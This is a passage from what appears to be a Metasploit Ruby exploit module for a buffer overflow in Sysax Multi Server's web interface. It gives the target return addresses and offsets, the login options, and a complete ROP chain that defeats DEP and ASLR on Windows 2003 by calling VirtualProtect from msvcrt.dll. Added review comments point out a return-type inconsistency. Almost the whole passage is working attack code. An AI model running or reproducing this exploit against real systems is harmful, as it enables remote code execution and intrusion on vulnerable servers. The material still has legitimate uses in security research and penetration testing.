Sysax Multi Server函数缓冲区溢出漏洞(2)

'Targets'       =>
                [
                    [ 'Windows XP SP3',
                        {
                            'Rop'       =>   false,
                            'Ret'       =>   0x77c35459, # push esp #  ret [sysaxd.exe]
                            'Offset'    =>   701,
                        }
                    ],
                    [ 'Windows 2003 SP1-SP2 DEP & ASLR Bypass',
                        {
                            'Rop'       =>   true,
                            'Ret'       =>   0x77baf605, # pivot
                            'Offset'    =>   701,
                            'Nop'       =>   0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll]
                        }
                    ],
                ],
            'Privileged'    => false,
            'DisclosureDate'=> 'July 29, 2012',
            'DefaultTarget' => 0))

register_options(
                [
                    OptString.new('URI', [false, "URI for Multi Server", '/']),
                    Opt::RPORT(80),
                    OptString.new('SysaxUSER', [ true, "Username" ]),
                    OptString.new('SysaxPASS', [ true, "Password" ])
                ], self.class)
        
    end

def target_url
  # Base URL of the Multi Server web interface.  The URI option is appended
  # exactly as configured; nothing normalises leading or trailing slashes.
  host = rhost
  port = rport
  path = datastore['URI']
  "http://#{host}:#{port}#{path}"
end

# Builds the ROP chain used by the second target (targets[1], labelled
# 'Windows 2003 SP1-SP2 DEP & ASLR Bypass' in the target table).
#
# Every gadget is annotated with its origin module ([msvcrt.dll]), so the
# chain is only valid for that particular msvcrt.dll build and would have to
# be regenerated for any other.  Per the inline gadget comments, the chain
# reads the VirtualProtect address through the msvcrt.dll IAT and sets up
# registers before the final PUSHAD gadget.
#
# @return [String] the gadget addresses packed as little-endian 32-bit
#   values ("V*") when the selected target is targets[1]
# @return [Array] the empty Array assigned at the top of the method for any
#   other target -- NOTE(review): the two branches return different types;
#   a caller appending the result with String#<< would raise TypeError on
#   the empty-Array path.  The caller is outside this view, so confirm how it
#   treats non-ROP targets before relying on either type.
def create_rop_chain()
        rop_gadgets = []
        # All rop gadgets generated by mona.py
        # Thanks corelanc0d3r for making such a great tool

if (target == targets[1]) # Windows 2003
            rop_gadgets =
            [
                0x77be3adb, # POP EAX # RETN [msvcrt.dll]
                0x77ba1114, # ptr to &VirtualProtect() [IAT msvcrt.dll]
                0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN [msvcrt.dll]
                0x41414141, # Filler (compensate)
                0x77bb0c86, # XCHG EAX,ESI # RETN [msvcrt.dll]
                0x77bdb896, # POP EBP # RETN [msvcrt.dll]
                0x77be2265, # & push esp #  ret  [msvcrt.dll]
                0x77bdeebf, # POP EAX # RETN [msvcrt.dll]
                0x2cfe0668, # put delta into eax (-> put 0x00000201 into ebx)
                0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
                0x77bdfe37, # ADD EBX,EAX # OR EAX,3000000 # RETN [msvcrt.dll]
                0x77bdf0da, # POP EAX # RETN [msvcrt.dll]
                0x2cfe04a7, # put delta into eax (-> put 0x00000040 into edx)
                0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
                0x77bb8285, # XCHG EAX,EDX # RETN [msvcrt.dll]
                0x77bcc2ee, # POP ECX # RETN [msvcrt.dll]
                0x77befbb4, # &Writable location [msvcrt.dll]
                0x77bbf75e, # POP EDI # RETN [msvcrt.dll]
                0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll]
                0x77bdf0da, # POP EAX # RETN [msvcrt.dll]
                0x90909090, # nop
                0x77be6591, # PUSHAD # ADD AL,0EF # RETN [msvcrt.dll]
            ].flatten.pack("V*") # flatten is a no-op: the array is already flat
        end

return rop_gadgets

end
